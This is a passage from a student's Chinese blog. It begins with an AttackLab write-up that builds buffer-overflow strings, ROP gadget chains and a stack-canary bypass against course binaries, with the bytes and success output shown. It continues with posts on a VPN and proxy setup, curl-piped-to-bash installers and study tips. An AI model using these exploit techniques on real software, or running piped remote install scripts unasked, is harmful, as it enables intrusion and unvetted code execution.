48 c7 c7 b8 46 63 55 68
7d 20 40 00 c3 3f 3f 3f
3f 3f 3f 3f 3f 3f 3f 3f
88 46 63 55 00 00 00 00
09 00 00 00 00 00 00 00
18 28 40 00 00 00 00 00
31 31 61 36 37 36 31 30

再依次运行:

./hex2raw < p3.txt > p3a.txt
./ctarget -i p3a.txt

于是再次大功告成!

Cookie: 0x11a67610
Touch3!: You called touch3("11a67610")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!

Phase4

这题踩了许多的坑:

  • 只有 popq 可以将你溢出的信息注入到寄存器中(movl/q 不行)
  • 你必须要对齐 16 字节(而不是 8 字节!)栈指针,即使得任何时候,%rsp 的最后一位都要是 0,否则会引发段错误
  • ~~实在在 farm.c 中找 gadget 找不到的话,也可以直接找找 rtarget.s,但据助教所说,那个 binary 里并不是每一个 section 都是固定地址的,所以如果用了非固定地址的 gadget 会导致问题~~ 如果用了 farm 以外的 gadget,可能导致本地过了但远程测试服务器没分,再找找!
  • 在具体的语句(popq / movl/q)和 retc3)中,可能存在 0x90NOP

请务必先全部看完,因为前面写的很多步骤是错误的!!!后面才一边踩坑一边改正!!!

首先,因为我们要使用 ROP 攻击,我们需要将 farm.c 转为字节码:

gcc -c farm.c
objdump -d farm.o > farm.s

因为我们实际要利用的是代码片段根据不同起始引发的 “二义性”,所以我在 VS Code 中执行了如下的正则表达式替换:

  • .+:\t(([0-9a-f]{2} )+).+ 替换为 $1
  • (([0-9a-f]{2} )+)\n 替换为 $1

想要看我的正则表达式的含义,可以使用 Regex Vis 网站,上述用例可以参见:

这样就可以让我的代码变得只有字节,也就便于我们后续查找我们所需要的 gadget:

000000000000000f <getval_442>:
f3 0f 1e fa 55 48 89 e5 b8 48 89 c7 91 5d c3

因为 popq 可以将我们所需要的字符串弹栈到某个寄存器中,于是我们根据下表,检索:

Cleanshot-2023-10-18-at-08.25.14@2x

5[89a-f] c3

发现我们全文只有 5d c3,也就是 popq %rbp

显然我们需要将之移动到代表第一个参数的 %rdi 中,于是根据:

Cleanshot-2023-10-18-at-11.09.35@2x

Cleanshot-2023-10-18-at-11.09.45@2x

我们需要检索

  • movq %rbp D 48 89 e[89a-f] c3
  • movl %ebp D89 e[89a-f] c3

直接检索公用后缀即可:

89 e[89a-f] c3

发现均没有(草!)

于是又经历几次踩坑,我最终听从树洞的说法,直接忽视了 handout 里要求只能在 farm.c 中查找的要求,转而对 rtarget 直接进行检索:

objdump -d rtarget > rtarget.s

如同前文一样,进行正则表达式替换或者直接使用如下式子检索跳行的 c3

5[89a-f](\s+\t.+\n.+:\t)c3

调整第一个中括号可以精确匹配寄存器

在文件末尾找到了一个 5f c3,对应 popq %rdi ,直接一步到位!

  403912:	41 5f                	pop    %r15
  403914:	c3

从而我们找到了所需 gadget 地址:0x403913

于是我们可以开始构造:

  1. 0x00403913:第一个 gadget
  2. 0x11a67610:Cookie
  3. 0x00401ea8:touch2 函数起始点,注意可能和之前 ctarget 的 touch2 函数起始点不一样了

直接构造 p4.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
13 39 40 00 00 00 00 00
10 76 a6 11 00 00 00 00
a8 1e 40 00 00 00 00 00

运行

./hex2raw < p4.txt > p4a.txt
./rtarget -i p4a.txt

发现报错段错误,通过 gdb 检查发现我们确实修改了 %rdi 寄存器的信息,进入了 touch2 函数,甚至都打印了成功信息!

Cleanshot-2023-10-18-at-11.29.12@2x

Cleanshot-2023-10-18-at-11.29.56@2x

那为什么还是不行呢?这时我们回忆起 phase2 中说明了我们需要完成栈指针的 16 字节对齐,通过 gdb 调试,我们发现我们在执行遇到段错误前,我们的栈指针是 0x7fffbc3a09d8 这不是一个 16 字节对齐的数(最后一位是 0 才对):

Cleanshot-2023-10-18-at-11.48.53@2x

所以我们类似地,在 rtarget.s 中检索一些 nop 指令以对齐,我选择的是 20 c0 ,直接检索找到

000000000040223c <setval_254>:
  40223c:	f3 0f 1e fa          	endbr64
  402240:	c7 07 c9 ca 20 c0    	movl   $0xc020cac9,(%rdi)
  402246:	c3                   	ret

事实上直到行文至此,我才彻底找到了之前没能成功在 farm 中找到想要的 gadget 的原因:直接编译 farm.c 再反编译出来的字节码和直接反编译 rtarget.c 得到的的不一样!!!

Cleanshot-2023-10-18-at-12.00.02@2x

不过已经到这里了,那就先不修改了,反正我幸运地找到了一个固定地址的 gadget~

修改 p4.txt 如下,加入第 6 行即可

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
13 39 40 00 00 00 00 00
10 76 a6 11 00 00 00 00
44 22 40 00 00 00 00 00
a8 1e 40 00 00 00 00 00

运行

./hex2raw < p4.txt > p4a.txt
./rtarget -i p4a.txt

~~大功告成!~~

Cookie: 0x11a67610
Touch2!: You called touch2(0x11a67610)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!

告不了一点,发现得到的是 0.0 的分数,说明越界的 gadget 在远程服务器上无法得分,于是询问大佬,发现之前的过程中忘了可以插入 0x90 作为 nop,于是再次以正则表达式检索:

5[89a-f] (90 )+c3

成功找到一个新地址 0x4021bc,可以实现 popq %rax

00000000004021b4 <addval_168>:
f3 0f 1e fa 8d 87 0d 92 58 90 c3

同时,我们还需要 movq %rax %rdi 或者 movl %eax %edi,查表对应 48 89 c7,检查得到第二个地址:0x4021a4

000000000040219e <setval_337>:
f3 0f 1e fa c7 07 48 89 c7 c3 c3

修改 p4.txt 如下:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
bc 21 40 00 00 00 00 00
10 76 a6 11 00 00 00 00
a4 21 40 00 00 00 00 00
a8 1e 40 00 00 00 00 00

运行

./hex2raw < p4.txt > p4a.txt
./rtarget -i p4a.txt

这下终于大功告成了!

Phase5

本题类似 Phase3,我们需要讲一个字符数组的起始地址作为 %rdi 传参到 touch3 函数。

先把 Cookie 转码:31 31 61 36 37 36 31 30

根据在 Phase4 中所述方法,首先将全文替换为字节码,以函数截断:

# Bash
objdump -d rtarget > rtarget.s
cp rtarget.s rtarget.s2

然后,在 VS Code 中执行正则替换:

  • .+:\t(([0-9a-f]{2} )+).+ 替换为 $1
  • (([0-9a-f]{2} )+)\n 替换为 $1

然后对照表格,查找我们所需要的字节码。

大致解题思路如下:

  1. 填充 24 个字节导致溢出,开始利用 ROP
  2. %rsp 的值压入某寄存器,如 %rdi
  3. 将某寄存器如 %rax 使用 popq 改写为立即数 Offset,其中 Offset 为初始栈顶指针 %rsp 到我们溢出的 Cookie 字符数组的地址的偏移量
  4. 利用 leaq 计算 Offset + 初始栈顶指针,得到 Cookie 字符数组地址,传给 %rdi
  5. 跳转到 touch3 函数

对照表格和拥有的 farm,编写代码 p5.s

movq %rsp,%rax
ret
movq %rax,%rdi
ret
popq %rax
nop
ret
mov %eax,%ecx
nop
ret
mov %ecx,%edx
testb %al,%al
ret
mov %edx,%esi
and %dl,%dl
ret
leaq (%rdi, %rsi, 1),%rax
movq %rax,%rdi
ret

(有一些无效代码,这些代码是对照最终答案的字节码调整添加的)

运行:

gcc -c p5.s && objdump -d p5.o > p5.byte

得到 p5.byte 可以用以检验:


p5.o:     file format elf64-x86-64


Disasm of section .text:

0000000000000000 <.text>:
   0:	48 89 e0             	mov    %rsp,%rax
   3:	c3                   	ret
   4:	48 89 c7             	mov    %rax,%rdi
   7:	c3                   	ret
   8:	58                   	pop    %rax
   9:	90                   	nop
   a:	c3                   	ret
   b:	89 c1                	mov    %eax,%ecx
   d:	90                   	nop
   e:	c3                   	ret
   f:	89 ca                	mov    %ecx,%edx
  11:	84 c0                	test   %al,%al
  13:	c3                   	ret
  14:	89 d6                	mov    %edx,%esi
  16:	20 d2                	and    %dl,%dl
  18:	c3                   	ret
  19:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  1d:	48 89 c7             	mov    %rax,%rdi
  20:	c3                   	ret

挨个搜就行了 ~~,注意 Phase4 中提到的,正则表达式替换会导致丧失对齐特性的问题,一定根据初始 objdump 得到的代码中的指令地址加以定位。~~

于是我们得到 p5.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
8d 22 40 00 00 00 00 00
a4 21 40 00 00 00 00 00
bc 21 40 00 00 00 00 00
48 00 00 00 00 00 00 00
ad 22 40 00 00 00 00 00
ee 22 40 00 00 00 00 00
81 22 40 00 00 00 00 00
f9 21 40 00 00 00 00 00
a4 21 40 00 00 00 00 00
cd 1f 40 00 00 00 00 00
31 31 61 36 37 36 31 30
00 00 00 00 00 00 00 00

运行:

./hex2raw < p5.txt > p5a.txt
./rtarget -i p5a.txt

大功告成!

Cookie: 0x11a67610
Touch3!: You called touch3("11a67610")
Valid solution for level 3 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!

Phase 6

由于前面的 Phase4 已经把所有能踩的坑全踩了一遍,Phase6 做的还挺快的。

老样子,先进行反汇编操作:

objdump -d starget > starget.s

观察代码其中的 getbuf_withcanary 函数,发现这个函数现在有了金丝雀值保护,这意味着我们不能简单地通过栈溢出解决。

但我们同时注意到,其代码中存在两个奇怪的 memcpy 函数,分别位于 0x4021410x40216a

  402118:	e8 ed 02 00 00       	call   40240a <Gets>
  40211d:	8b 85 70 ff ff ff    	mov    -0x90(%rbp),%eax
  402123:	48 63 d0             	movslq %eax,%rdx
  402126:	48 8d 85 70 fe ff ff 	lea    -0x190(%rbp),%rax
  40212d:	48 8d 88 08 01 00 00 	lea    0x108(%rax),%rcx
  402134:	48 8d 85 70 fe ff ff 	lea    -0x190(%rbp),%rax
  40213b:	48 89 ce             	mov    %rcx,%rsi
  40213e:	48 89 c7             	mov    %rax,%rdi
  402141:	e8 2a f2 ff ff       	call   401370 <memcpy@plt>
  402146:	8b 85 74 ff ff ff    	mov    -0x8c(%rbp),%eax
  40214c:	48 63 d0             	movslq %eax,%rdx
  40214f:	48 8d 85 70 fe ff ff 	lea    -0x190(%rbp),%rax
  402156:	48 8d 8d 70 fe ff ff 	lea    -0x190(%rbp),%rcx
  40215d:	48 81 c1 08 01 00 00 	add    $0x108,%rcx
  402164:	48 89 c6             	mov    %rax,%rsi
  402167:	48 89 cf             	mov    %rcx,%rdi
  40216a:	e8 01 f2 ff ff       	call   401370 <memcpy@plt>

查阅 memcpy 的说明文档

void *memcpy(void *str1, const void *str2, size_t n)

得知其接受三个参数,依次是 目标地址 %rdi源地址 %rsi长度 %rdx

进一步阅读代码,我们可以得到第一次 memcpy 时,关键的几个寄存器和值各自的位置(从高地址向低地址排列,左侧偏移值相对栈顶而言):

  • (+0x190)%rbp,栈底
  • (+0x188)金丝雀值
  • (+0x108)%rsi,源地址
  • (+0x100)%rdx,复制的长度
  • (+0x000)%rdi%rsp,栈顶、目标地址

类似地,得到第二次 memcpy 时,关键的几个寄存器和值各自的位置(从高地址向低地址排列,左侧偏移值相对栈顶而言):

  • (+0x190)%rbp,栈底
  • (+0x188)金丝雀值
  • (+0x108)%rdi,目标地址
  • (+0x104)%rdx,复制的长度
  • (+0x000)%rsi%rsp,栈顶,源地址

于是我们可以开始构造输入值 p6.txt,通过控制两次复制的长度,以实现第一次复制时将金丝雀值复制下来,同时在第二次复制时,将金丝雀值连同我们注入的 ROP 攻击代码复制上去,从而实现绕过金丝雀值的保护:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
8d 22 40 00 00 00 00 00 // phase5 的攻击代码起始地址
a4 21 40 00 00 00 00 00
bc 21 40 00 00 00 00 00
48 00 00 00 00 00 00 00
ad 22 40 00 00 00 00 00
ee 22 40 00 00 00 00 00
81 22 40 00 00 00 00 00
f9 21 40 00 00 00 00 00
a4 21 40 00 00 00 00 00
cd 1f 40 00 00 00 00 00
31 31 61 36 37 36 31 30
00 00 00 00 00 00 00 00 // phase5 的攻击代码结束地址
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
88 00 00 00 00 01 00 00 // 覆写 0x88 和 0x100 两个局部变量

直接运行发现遇到了段错误,顺理成章地想到我们在 phase4 中踩过的坑,栈指针没有对应十六字节,导致错误。

所以我们略微调整一下输入代码,引入一下 phase4 中就找到的无义序列地址 0x402244 并减少后面的一行代码,得到新的 p6.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
44 22 40 00 00 00 00 00
8d 22 40 00 00 00 00 00
a4 21 40 00 00 00 00 00
bc 21 40 00 00 00 00 00
48 00 00 00 00 00 00 00
ad 22 40 00 00 00 00 00
ee 22 40 00 00 00 00 00
81 22 40 00 00 00 00 00
f9 21 40 00 00 00 00 00
a4 21 40 00 00 00 00 00
cd 1f 40 00 00 00 00 00
31 31 61 36 37 36 31 30
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
88 00 00 00 00 01 00 00

编译运行:

./hex2raw < p6.txt > p6a.txt
./starget -i p6a.txt

一遍通过!

Cookie: 0x11a67610
Touch3!: You called touch3("11a67610")
Valid solution for level 3 with target starget
PASS: Sent exploit string to server to be validated.
NICE JOB!

至此,我们终于踩完了所有的坑,完成了 AttackLab!

参考资料

💾

PKU VPN 2 - 真正实现 PKU VPN 和 Clash 兼容使用

2023年10月12日 19:23

之前一直采用的是 openconnect 方案,然而其总是会造成断连之后的网络丢失,于是又经过一番折腾,我终于摸索出了最完美的 VPN 兼容使用方案,其可以做到:

  • 对于所有 pku.edu.cn 域名的地址,采用北大官方代理
  • 对于所有其他地址,采用 Clash 代理

于是,我终于可以在家中同时打开 autolab.pku.edu.cn、链接 class_machine、然后还能随意的 google 了~

本文提供了两种方式:

  • 自定义 PAC 方式:操作简单适合小白
  • 自定义 Clash 订阅方式:技术要求稍高,适合爱折腾还有强迫症的(比如我)

PKU VPN

不同于官方提供的 Pulse Secure 应用程序方法,我们采用部署在 Docker 内的 Openconnect 方案:

thezzisu/OCProxy-oci

在任意一个目录下新建 pku.env 文件,填写如下内容:

USER=Your student ID
PASS=Your password
URL=vpn.pku.edu.cn
OC_ARGS=--protocol=pulse
ID_CARD=Your ID card last 6 digits
PHONE_NUMBER=The 4th to 7th digits of your mobile phone number. e.g. 12345678910 -> 4567

2024.01.28 更新,此处一定要使用 pulse 协议才可以连接成功。以前使用的是 nc 协议。

2024.02.08 更新,受计算中心更新影响,需要重新拉取一下 Docker 镜像以适配更新。

然后,在当前目录下打开终端,使用 Docker 技术,拉取镜像并启动应用:

docker pull ghcr.io/thezzisu/ocproxy:latest
docker run -d --name pku-vpn --env-file=pku.env -p 11080:1080 ghcr.io/thezzisu/ocproxy:latest

如果你没有 Docker,而且是 Mac,那我推荐使用 OrbStack

这会在你的 11080 端口启动一个北大 VPN 的代理服务。

Docker 启动的已知问题:

  • 有概率自动掉线,相较于终端直接使用

    sudo openconnect --protocol=pulse https://vpn.pku.edu.cn
    

    不稳定,需要手动重启。

    可以通过 docker logs 查看,每次连接的有效期约为 12 小时。

  • ~~当连接数过多时(超过 2 个,也偶见 1 个),脚本无法处理,需要使用 Pulse Secure 或者上文的 openconnect 指令进行连接后,手动关闭(顶掉)一个链接。~~

    已经通过在 Docker 内捕捉 SIGTERM 信号解决(ICS 学的最好的一集,乐)

  • 若 Clash 规则没有排除 vpn.pku.edu.cn,则不兼容 Clash 的 TUN / 增强模式。

基于自定义 PAC 的分流(不推荐)

不推荐这种方式,因为若想要终止代理还得进设置。与之相对的,后文基于 Clash 规则的分流只需要在菜单栏点击切换策略即可。

pac-config

较为简单的方式,即通过 PAC 文件分流你的代理,在启动了 Docker 版的 PKU VPN 后,打开 系统设置 - 网络 - Wi-Fi - 详细信息 - 代理 - 自动配置代理:

Preference

填入如下 URL:

https://cdn.arthals.ink/pku_proxy.pac

或者你也可以自行部署:

function FindProxyForURL(url, host) {
  if (shExpMatch(host, '*.pku.edu.cn')) {
    return 'SOCKS5 127.0.0.1:11080'
  }
  return 'PROXY 127.0.0.1:7890'
}

基于自定义 Clash 配置文件的分流

clash-config

更优的方式,一次配好再也不管,切换比 PAC 方式简单,但是需要在现有订阅规则上进行修改。

不要觉得 Clash 规则很麻烦,其实就是一个类似于字典的东西。

我使用的是 PyYAML + FastAPI 的方案。

你也可以直接采用本地 parser 的方案。以下首先介绍自托管配置文件的配置方法。

服务端设置

服务端的主要目标是在服务器上托管一个自动更新并覆写订阅的程序,这需要多个进程协同工作:

  • 一个 Python 进程,基于 PyYAML 实现,用以更新并覆写订阅配置,使用 Crontab 每天定时执行
  • 一个 Python 进程,基于 FastAPI 实现,用以提供一个暴露配置文件的接口,从而为客户端自动更新提供订阅地址。

更新并修改订阅配置的脚本(Python,PyYAML,核心)

# -*- encoding: utf-8 -*-
#@Author  :   Arthals
#@File    :   updater.py
#@Time    :   2023/04/28 20:42:24
#@Contact :   zhuozhiyongde@126.com
#@Software:   Visual Studio Code

import requests
import os
import yaml


def update():
    url = 'https://yoursubscribe.url'

    r = requests.get(url, timeout=10)
    data = yaml.safe_load(r.text)

    # 添加外部访问密码
    data['secret'] = 'xxxxxxx'

    # 添加 PKU VPN
    pku_proxy = {
        'name': 'PKU',
        'server': '127.0.0.1',
        'port': 11080,
        'type': 'socks5'
    }

    data['proxies'].insert(0, pku_proxy)

    pku_group = {'name': '🎓 北京大学', 'type': 'select', 'proxies': ['PKU']}

    data['proxy-groups'].insert(0, pku_group)
    # 一定要让 vpn 在前面,否则不能兼容 Clash 的 TUN 模式
    data['rules'].insert(0, 'DOMAIN-SUFFIX,vpn.pku.edu.cn,DIRECT')
    data['rules'].insert(1, 'DOMAIN-SUFFIX,pku.edu.cn,🎓 北京大学')

    # 添加自定义规则
    with open('custom_rules.txt', 'r', encoding='utf-8') as f:
        rules = f.readlines()
        for rule in rules:
            rule = '%s,🔰 节点选择' % rule.rstrip("\n")
            data['rules'].insert(0, rule)

    # 添加 fallback 策略组
    fallback_group = {
        'name': '🍂 Fallback',
        'type': 'fallback',
        'proxies': ['♻️ 自动选择'],
        'url': 'http://www.gstatic.com/generate_204',
        'interval': 300
    }
    data['proxy-groups'].insert(0, fallback_group)

    # 导出 yaml 文件
    yaml.Dumper.ignore_aliases = lambda *args: True
    with open('Arthals.yaml', 'w') as file:
        yaml.dump(data, file, allow_unicode=True, default_flow_style=False)
        # print(t.encode('UTF-8'))


if __name__ == '__main__':
    try:
        update()
        os.system('pm2 restart Clash')
        os.system(
            'export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890'
        )

    except Exception as e:
        print(repr(e))

定时更新配置文件(Crontab)

# crontab, refresh every 6 hours
0 */6 * * * python ~/.config/clash/updater.py >> ~/.config/clash/update.log 2>&1

守护 Clash 代理进程(PM2,可不配置)

// PM2 Config for Clash
module.exports = {
  apps: [
    {
      name: 'Clash',
      script: './clash -f ~/.config/clash/Arthals.yaml'
    }
  ]
}

当然,你也可以使用诸如 nohup 之类的其他方法替代 PM2 实现守护进程,使用 schedule 库来替代 Crontab 定时执行。

启动后端订阅接口服务(Python,FastAPI)

用以提供自定义地址,供自己的电脑更新使用。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#@Author  :   Arthals
#@File    :   CustomAPI.py
#@Time    :   2023/09/20 00:46:28
#@Contact :   zhuozhiyongde@126.com
#@Software:   Visual Studio Code

from fastapi import FastAPI, Response

app = FastAPI()

def get_clash_config():
    # 打开/home/ubuntu/.config/clash/Arthals.yaml,并以UTF-8编码返回
    try:
        with open('/home/ubuntu/.config/clash/Arthals.yaml',
                  'r',
                  encoding='utf-8') as f:
            resp = f.read()
            return resp
    except Exception:
        return None

@app.get('/clash')
async def get_config(token: str):
    # 检查params中是否有token,且token是否正确
    if token != 'xxxxxxx':
        return Response(status_code=403)

    return Response(content=get_clash_config(), media_type='text/plain')

守护后端订阅接口服务(PM2)

// PM2 Config for CustomAPI
module.exports = {
  apps: [
    {
      name: 'CustomAPI',
      script: 'uvicorn CustomAPI:app --port 2625 --host 0.0.0.0 --reload'
    }
  ]
}

在对应文件夹启动相关 PM2 服务即可,然后再配置一个反向代理(服务器)或者直接在本地启动,然后将转换后的 URL 填入 Clash 就完成了~

我的目录结构如下,供参考:

tree -P "Custom-API|\.config/clash" --matchdirs --prune -a -L 4
.
├── .config
│   └── clash
│       ├── Arthals-without-pku.yaml
│       ├── Arthals.yaml
│       ├── cache.db
│       ├── clash
│       ├── clash-old
│       ├── clash_rule_providers.yaml
│       ├── clash_rules.yaml
│       ├── config.yaml
│       ├── Country.mmdb
│       ├── ecosystem.config.js
│       ├── raw-update.sh
│       ├── update.log
│       ├── updater.py
│       └── update.sh
└── Custom-API
    ├── CustomAPI.py
    └── ecosystem.config.js

生成的 YAML 配置文件大致如下:

allow-lan: true
external-controller: :9090
log-level: info
mode: Rule
port: 7890
proxies:
-   name: PKU
    port: 11080
    server: 127.0.0.1
    type: socks5
...
proxy-groups:
-   name: 🎓 北京大学
    proxies:
    - PKU
    - DIRECT
    type: select
...
rules:
- DOMAIN-SUFFIX,pku.edu.cn,🎓 北京大学
- RULE-SET,private,DIRECT
- RULE-SET,reject,REJECT
...
- MATCH,DIRECT
secret: xxxxxxx
socks-port: 7891

折腾完这些后,你就可以实现身在家里网在校的代理环境啦~

客户端

在客户端,你需要做的事情是:

  • 启动 Docker 代理服务器
  • 在 Clash 中填写服务端配置好的订阅 URL

具体的配置方式,请参照前文的 PKU VPN 一节。

基于 Clash Parser 的客户端配置方案(最简洁)

parsers:
  - url: https://you-subscribe-url
    yaml:
      prepend-proxy-groups:
        - name: 🎓 北京大学
          type: select
          proxies:
            - PKU
            - DIRECT
      prepend-proxies:
        - name: PKU
          port: 11080
          server: localhost
          type: socks5
      prepend-rules:
        - DOMAIN-SUFFIX,pku.edu.cn,🎓 北京大学

替换订阅地址为你的订阅地址即可。如果你不会使用 Parser,可以自行搜索相关教程。

Class Machine

对于 VS Code 的 Remote SSH,你需要额外配置 ssh_config 如下:

Host ICS
   HostName 162.105.31.232
   ProxyCommand nc -X 5 -x 127.0.0.1:11080 %h %p
   Port 22222
   User u2222222222

即你需要额外配置一个 ProxyCommand 以实现代理。

这是 macOS 的代理指令,对于其他平台,请参考:https://ericclose.github.io/git-proxy-config.html

Credit

感谢 @thezzisu 助教提供的灵感和实现~

💾

从零开始配置 Linux

2023年10月5日 14:26

先放两个 Star List 在这里:

1Panel

文档

1Panel-dev/1Panel

安装命令

curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh

猫猫

mihomo

从备份中获取:

  • clash 二进制文件
  • Country.mmdb 地理数据库

通过 sftp 上传到服务器,目标地址 ~/.config/clash

我使用 yacd 来作为 web 界面。

如果你需要 GUI,那么可以考虑 clash-nyanpasu

Nvm

我使用 nvm 来对 Node.js 版本进行管理。

nvm

curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.1/install.sh | bash

安装完成后,换源,将如下命令追加到 .bashrc

export NVM_NODEJS_ORG_MIRROR=http://npm.taobao.org/mirrors/node

Nrm

nrm

npm install -g nrm

MiniConda

Minoconda

我使用 MiniConda 来管理 Python 版本、环境。

mkdir -p ~/.miniconda3
wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/.miniconda3/miniconda.sh
bash ~/.miniconda3/miniconda.sh -b -u -p ~/.miniconda3
rm ~/.miniconda3/miniconda.sh

Zoxide

zoxide

curl -sS https://raw.githubusercontent.com/ajeetdsouza/zoxide/main/install.sh | bash

Starship

starship

curl -sS https://starship.rs/install.sh | sh

fzf

fzf

git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf
~/.fzf/install

搭配 ag 使用

sudo apt-get install silversearcher-ag

Zsh

我使用 rcm 来管理配置文件 dotfiles, 通过 rcm 可以将配置文件备份至 ~/.dotfiles,也可以从 ~/.dotfiles 通过软连接的形式还原备份至 ~

从 dotfiles 还原备份至 ~/.dotfiles

rcup -t linux

Pnpm

pnpm

npm i pnpm -g

💾

ICS-Automake

2023年9月26日 08:52

每次更改完代码,还要自己 make 一下,于是我开始犯懒...

以下所有操作均默认在 datalab-handout 文件夹下进行。推荐使用 Python 法,对于网络环境没有要求,可以在 ICS Class Machine 上正常使用。PM2 法优点是操作简单,但是 Watch 效果好像不算及时。

Python

datalab-handout 文件夹下,新建如下 Python 脚本 automake.py

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#@Author  :   Arthals
#@File    :   monitor.py
#@Time    :   2023/09/25 08:13:23
#@Contact :   zhuozhiyongde@126.com
#@Software:   Visual Studio Code

import os
import hashlib
import time


def get_file_hash(file_path):
    with open(file_path, 'rb') as f:
        content = f.read()
        file_hash = hashlib.md5(content).hexdigest()
    return file_hash


def monitor_file(file_path):
    last_file_hash = get_file_hash(file_path)

    while True:
        current_file_hash = get_file_hash(file_path)

        if current_file_hash != last_file_hash:
            print("文件内容已修改")
            os.system("make")
            last_file_hash = current_file_hash

        time.sleep(1)  # 每秒监测一次


file_path = "./bits.c"
monitor_file(file_path)

启动:

nohup python automake.py > automake.log 2>&1 &

查看日志:

tail -f automake.log

终止:

kill $(ps aux | grep automake.py | awk '{print $2}')

PM2

注:以下方法在 ICS Class Machine 上不可用,因为其限制了对于外网的访问,无法安装 pm2,所以你只能在本地 WSL2 或者远程 Ubuntu 系统中使用。

安装 pm2

sudo apt update
sudo apt upgrade

sudo apt install nodejs npm

npm config set registry http://registry.npm.taobao.org/ # 换源淘宝源

sudo npm install pm2 -g

进入 datalab-handout 文件夹,创建 ecosystem.config.js,然后输入以下配置:

module.exports = {
  apps: [
    {
      name: 'ics-automake',
      script: 'make',
      watch: 'bits.c'
    }
  ]
}

启动 pm2 服务:

pm2 start

然后你就可以享受自动 make 了~

终止:

pm2 delete ics-automake

遇到报错

没有执行权限

执行以下命令为当前目录下的所有文件添加可执行权限:

chmod +x ./**/*

libc.so.6: version 'GLIBC_2.16' not found

执行 make 可能会提示 libc6 版本过低(如我使用的 Ubuntu 20.04),此时你可能需要参照以下步骤:

  • 参照 Ubuntu 官方说明,修改 /etc/apt/sources.list 进行换源。我选择的是清华源:

    deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ jammy main
    
  • 输入 sudo apt-get upgrade libc6

然后即可按照 datalab-writeup.pdf 中的说明,使用各种的本地评测工具,并实现自动在 bits.c 更新时 make 了。

DataLab 踩坑

  • 使用 btest -f [fuction] 可以对单函数进行简单检验
  • 使用 ./ishow ./fshow 看不到二进制表示,你可能需要自己转码或者上网搜相关工具
  • btest 过了不一定 driver.pl 可以过,只有当 ./driver.pl 过了才可以满分
  • 变量名要声明在函数顶部
  • 要善用 debug 工具,如 ./dlc -z bits.c 检查 ops 数目与代码规范,不要忽视任何一个 warning/error ,如果格式检查没过会直接 0 分
  • 本文中的 ics-automake 能存在时延,可以同时使用 pm2 logs ics-automake 观察
  • float64_f2i 这道题,是 uf2 在高位,uf1 在低位,即 uf2的第一位是符号位。
  • 对于后面几个浮点数的题,不再有任何对于大常数、== <= >= 这种东西的限制,所以不必每个 mask 都自己生成一遍,或者用异或去判断等于,这样反而容易导致操作符超限。
  • float_negpwr 最后一题 scoreboard 能卷到 1 的是打表的,不要学(?

💾

医学生修信双经验

2023年9月19日 00:48

先修课

计算机科学技术双学位 / 智能科学与技术双学位要求:高等数学 B 上下、线性代数 B、计算概论 B。

其中计算概论 B 为医学部同学推荐课,但是数 B、线代 B 都不是,需要在跨院系选课的时候选(医学部推荐数 C,如果你选择在大一修先修课的话,你就得放弃选数 C,改为在跨院系选课时选择数 B)

数 B 和线代 B 都是很硬的课,高数 B 上下共计两个学期,一学期 5 学分,线代 B 只用上一学期 4 学分,加起来就是 14 学分,大一的时候医学预科往往学分安排很紧张,所以你可能需要放弃选择一些推荐课程,改为大二再来修,或者回了医学部修,具体请咨询辅导员和医学预科的老师。

大一的第一个学期无法申请超学分选课,大一下可以,但是硬性要求应该是绩点 3.7+。

对于大一新生来讲,高数的入门往往并不算容易,尤其是高数 B 这样人数超过一千的大课,想要获得 90 + 以上(对应绩点 3.8)的分数,势必是需要在平时额外下苦功夫刷题的,具体的经验可以参考我的博客:高等数学,学了又学

线代 B 在难度上甚至还超过了高数 B,所以也需要平时多下功夫,而不是考前突击。

高数 B 的推荐教辅是《谢惠民数学分析》,线代 B 的推荐教辅是《丘维声高等数学习题册》,因为北大公共数学课难度远超其他 C9 高校(按照我当时助教的话,北大高数 B 难度约等于浙大数学分析考研难度),所以一定要做好心理准备,平时也要用心去学,提前预习。

